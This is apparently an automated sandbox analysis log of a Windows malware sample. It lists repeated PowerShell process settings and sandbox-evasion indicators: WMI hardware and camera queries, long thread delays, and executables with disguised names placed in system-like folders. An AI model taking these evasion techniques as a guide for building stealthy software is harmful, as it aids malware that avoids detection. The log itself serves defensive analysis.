                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                                    Malware Analysis System Evasion

                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                    Source: C:\ChainbrowserNet\serverDll.exe Memory allocated: EE0000 memory reserve | memory write watch
                                    Source: C:\ChainbrowserNet\serverDll.exe Memory allocated: 1A950000 memory reserve | memory write watch
                                    Source: C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exe Memory allocated: 2390000 memory reserve | memory write watch
                                    Source: C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exe Memory allocated: 1A430000 memory reserve | memory write watch
                                    Source: C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exe Memory allocated: 16D0000 memory reserve | memory write watch
                                    Source: C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exe Memory allocated: 1B490000 memory reserve | memory write watch
                                    Source: C:\Recovery\Memory Compression.exe Memory allocated: 1020000 memory reserve | memory write watch
                                    Source: C:\Recovery\Memory Compression.exe Memory allocated: 1AC50000 memory reserve | memory write watch
                                    Source: C:\Recovery\Memory Compression.exe Memory allocated: 1A80000 memory reserve | memory write watch
                                    Source: C:\Recovery\Memory Compression.exe Memory allocated: 1B3F0000 memory reserve | memory write watch
                                    Source: C:\ChainbrowserNet\serverDll.exe Memory allocated: 17A0000 memory reserve | memory write watch
                                    Source: C:\ChainbrowserNet\serverDll.exe Memory allocated: 1B2A0000 memory reserve | memory write watch
                                    Source: C:\ChainbrowserNet\serverDll.exe Memory allocated: D30000 memory reserve | memory write watch
                                    Source: C:\ChainbrowserNet\serverDll.exe Memory allocated: 1AB00000 memory reserve | memory write watch
                                    Source: C:\Users\Default\Videos\System.exe Memory allocated: 1A20000 memory reserve | memory write watch
                                    Source: C:\Users\Default\Videos\System.exe Memory allocated: 1B590000 memory reserve | memory write watch
                                    Source: C:\Users\Default\Videos\System.exe Memory allocated: FE0000 memory reserve | memory write watch
                                    Source: C:\Users\Default\Videos\System.exe Memory allocated: 1ABA0000 memory reserve | memory write watch
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe Memory allocated: AB0000 memory reserve | memory write watch
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe Memory allocated: 1A7B0000 memory reserve | memory write watch
                                    Source: C:\ChainbrowserNet\serverDll.exe Thread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                                    Source: C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exe Thread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\Memory Compression.exe Thread delayed: delay time: 922337203685477
                                    Source: C:\ChainbrowserNet\serverDll.exe Thread delayed: delay time: 922337203685477
                                    Source: C:\Users\Default\Videos\System.exe Thread delayed: delay time: 922337203685477
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe Thread delayed: delay time: 922337203685477
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe Thread delayed: delay time: 600000
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe Thread delayed: delay time: 599871
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe Thread delayed: delay time: 599547
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe Thread delayed: delay time: 3600000
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe Thread delayed: delay time: 598891
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe Thread delayed: delay time: 598391
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe Thread delayed: delay time: 597703
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe Thread delayed: delay time: 597500
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe Thread delayed: delay time: 597172
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe Thread delayed: delay time: 596797
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe Thread delayed: delay time: 596469
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe Thread delayed: delay time: 596266
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe Thread delayed: delay time: 595983
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe Thread delayed: delay time: 595750
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe Thread delayed: delay time: 595360
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe Thread delayed: delay time: 594875
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe Thread delayed: delay time: 594453
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe Thread delayed: delay time: 594188
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe Thread delayed: delay time: 300000
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe Thread delayed: delay time: 593891
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe Thread delayed: delay time: 593701
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe Thread delayed: delay time: 593500
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe Thread delayed: delay time: 593228
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe Thread delayed: delay time: 592937
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe Thread delayed: delay time: 592453
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe Thread delayed: delay time: 592000
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe Thread delayed: delay time: 591641
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe Thread delayed: delay time: 591125
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe Thread delayed: delay time: 590625
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe Thread delayed: delay time: 590297
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe Thread delayed: delay time: 589906
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe Thread delayed: delay time: 589281
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe Thread delayed: delay time: 588844
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe Thread delayed: delay time: 588266
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 587902
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 587563
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 586547
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 586156
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 585703
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 585360
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 584840
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 584360
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 584050
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 583281
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 583028
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 582906
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 582531
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 582281
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 582100
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 581984
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 581864
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 581725
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 581621
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 581487
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 581360
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 581240
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 581031
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 580875
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 580738
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 580610
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 580485
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 580358
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 580235
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 580037
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 579899
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 579773
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 579669
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 579547
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 579422
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 579312
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeThread delayed: delay time: 579203
                                    Source: C:\Windows\SysWOW64\wscript.exe | Window found: window name: WSH-Timer
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exe | Evasive API call chain: GetLocalTime,DecisionNodes (graph_0-23733)
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -582531s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -582281s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -582100s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -581984s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -581864s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -581725s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -581621s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -581487s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -581360s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -581240s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -581031s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -580875s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -580738s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -580610s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -580485s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -580358s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -580235s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -580037s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -579899s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -579773s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -579669s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -579547s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -579422s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -579312s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exe TID: 9676Thread sleep time: -579203s >= -30000s
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                    Source: C:\ChainbrowserNet\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\ChainbrowserNet\serverDll.exeFile Volume queried: C:\ FullSizeInformation
